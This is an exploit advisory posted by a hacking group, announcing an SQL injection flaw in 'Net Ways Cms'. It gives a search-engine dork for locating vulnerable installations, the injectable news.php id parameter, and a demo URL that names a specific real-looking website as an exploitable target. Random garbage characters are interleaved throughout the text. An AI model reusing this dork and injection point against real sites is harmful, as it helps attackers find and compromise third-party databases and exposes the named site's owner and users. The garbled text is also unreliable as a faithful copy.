################################################################################??######## ' j9 W. T) P& g1 M
# 7 u0 a8 l! r, R+ @2 C8 w5 v4 x1 z
# Exploit Title : Net Ways Cms Sql Injection Vulnerability 3 \5 `0 B2 I0 Y* ^4 }" {8 l
# * n/ S0 j! P, r0 a2 d8 e
# Author : IrIsT.Ir
7 w+ ]9 @( [+ }8 a: h0 S, V6 C#
: a5 S/ p0 H/ U: U" I7 M8 D# Discovered By : Am!r
1 G* Y6 ~0 U, N: g/ d4 P4 e#
1 r i5 l1 k3 d9 {7 [# Home : http://IrIsT.Ir/forum % K! \6 T3 r8 R' u1 _( z
# ' l# [' v' {& z( y9 p
# Software Link : http://www.netways.com/ www.political-security.com x$ Y! I: M3 @! _/ g
#
3 f5 R# t1 F3 f+ U+ a! b2 A- |( p! p# Security Risk : High 3 Q. _$ Q; |& D6 P; d% I* }8 L6 a5 B
#
1 S/ T$ Z2 L3 z& y# Version : All Version
: J+ \$ y! u0 Z! N( ^" u, J# $ D$ S9 S; k9 y* v" a& a' a
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
5 p: n/ X" \" I. H) u#
. C9 a% f- V( F# Dork : intext:"Designed & developed by NetWays" 1 p' K$ u+ F; a
# 7 j1 i# e5 m; w- i$ `9 v; A
################################################################################??######## ; I" l! c W- h6 x0 D
# . u- E; ]2 I! C1 }$ @) {1 f
# Expl0iTs :
, I( @- ~& ~" v5 f( I+ T9 V3 S" f# 4 @5 }2 b" v5 [7 f
# http://target.com/news.php?id=[Sql] 9 O: \4 l( W5 s# T
#
1 W3 x! k+ _- j3 ^# 2 d/ I4 O- q1 t5 d( D, B9 B! x5 L
# D3mo :
+ l/ U- u# k& ? A% w1 a# " Q1 ]2 x7 D. k4 q+ E
# http://compagnieparento.com/news.php?id=7[Sql]
6 D6 Z7 s% p0 k* m#
W: w+ v; G$ Q: C: S################################################################################??########
! b- Z% a7 v8 Z4 P7 D7 J0 B/ k# - ?: ]% N) l5 S; c( ?; C
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r 6 ~* B6 k2 k2 {/ P* T! W: b' ?
# 1 G. S# i$ w7 Q1 ^ b" v6 i
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
) z8 L& K1 j7 S+ p/ Y% J# 3 x2 K" |0 P2 m/ |7 n4 U4 D* E
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
# T5 |6 z! X8 ^ v# 7 V+ f2 H( C1 c+ @- h5 t, w
################################################################################??######## |